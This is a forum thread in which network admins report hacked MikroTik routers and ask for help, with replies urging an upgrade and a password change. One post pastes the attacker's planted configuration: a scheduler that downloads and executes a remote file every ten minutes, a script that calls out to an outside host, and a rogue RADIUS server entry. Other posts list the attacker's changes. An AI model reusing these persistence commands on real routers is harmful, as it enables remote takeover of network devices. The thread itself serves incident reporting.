Hi to all, a client called me than something going wrong on his 1009 router which is running on latest 6.42.3 version.
By logging in i found two dumpded files on files directory and lot of changes in configuration
Any ideas???
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
]=\"\") do={\r\
\n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
\n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
rif\r\
\n}\r\
\nexecute [/file get autosupout1.rif contents]" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-date=jan/01/1970 start-time=00:00:00
add interval=30m name=a on-event=ip policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
start-time=startup
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
I believe 6.41.x doesn't have any vulnerability fix. You should be using 6.40.8 (or later in 6.40.x series - none yet) or 6.42.1 or later.It was updated to 6.41.3 exactly because of this vulnerability but it didn't help.
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static") keep-result=no}
Anyone can change your config if they have your password. This is not a vulnerability. They got your password before, not now.HOW is Fixed?
We have same problems on 6.42.4
indentity changet to TEST, created scheduler to script and script is:
is created new user admin, and is opened SSH link from russiaCode: Select all{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bc24d5c0d21bf27&action=upload&sncode=36C41FDED4E28E2E3A81E3C9415ED21D&dynamic=static") keep-result=no}
We try to make clear netinstall and set it back via export .. after few day is same situation ..
We cant limit acces via Winbox. But we have changet SSH port to other number, and allowed only www, winbox, ssh services (its Hotspot Machine)
If somebody has your password, it doen't matter what software you are running. Like suggested before, reinstall AFTER upgrade, and must change password AFTER upgrade.It is Even happening on 6.42.5 .
identity changing to 'test
adding up PPP servers
adding a masquerade rule
enabling Telnet and ssh
enabling admin
when i checked it was showing 300+ admin in active sessions on my CCR 1036 running on 6.42.5 and its happening again and again
Please provide solution for it.
You answered your own post. You are using vulnerable versions everywhere, with free access from the internet. Why waste time posting here, upgrade + change password!We have CCR1036 running in our network.
And last week we found a CCR1036 was hacked, it has a version of 6.38 and the log show an IP from Russia hacked and log in with API port.
The hacker leaves some message on the comment and let us drop money to his Bitcoin account. It's good that he didn't change the password and only blocked the access from Internet. So we can access it through local LAN.
And Today I found another device running 6.24.5 was hacked and this time, they changed my password and I cannot log in. And the entity name was changed to test.
I am finding the ways to access it, but no lucky. I'm not sure if I can access it through console.